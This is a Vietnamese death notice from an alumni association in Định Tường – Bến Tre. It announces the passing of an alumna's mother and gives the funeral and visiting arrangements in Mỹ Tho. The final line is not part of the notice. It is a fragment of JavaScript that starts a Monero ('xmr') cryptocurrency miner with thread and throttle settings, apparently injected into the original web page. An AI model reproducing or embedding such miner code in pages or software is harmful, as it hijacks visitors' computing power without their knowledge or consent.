TIN BUỒN - Thân mẫu của chị Huỳnh Thị Tuyết Nga Khóa 3 MS NLS ĐT đã từ trần .

                                                  TIN BUỒN


Ban liên lạc cựu học viên NLS Định Tường - Bến Tre đau buồn báo tin:

Thân mẫu của chị Huỳnh Thị Tuyết Nga, cựu học viên khóa 3 MS trường NLS Định Tường

 Đã qua đời ngày 22 /3/2019 ( nhằm ngày 17 tháng 2 năm Kỷ Hợi).
Linh cữu quàn tại tư gia đường Nguyễn Huỳnh Đức, Phường 8, Thành Phố Mỹ Tho.
Di quan sáng ngày 26/3/2019 ( nhằm ngày 21 tháng 2 năm Kỷ Hợi).

Tập thể thầy cô và CHV NLS Định Tường - Bến Tre chân thành chia buồn cùng gia đình chị Huỳnh Thị Tuyết Nga. Cầu mong Hương hồn của bác sớm tiêu diêu nơi miền cực lạc.

Ban liên lạc sẽ viếng tang lúc 16 giờ ngày 24 tháng 3 năm 2019.
Các bạn CHV NLS Định Tường Khóa 3 sẽ viếng tang vào lúc 15 giờ ngày 25 tháng 3 năm 2019.


', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();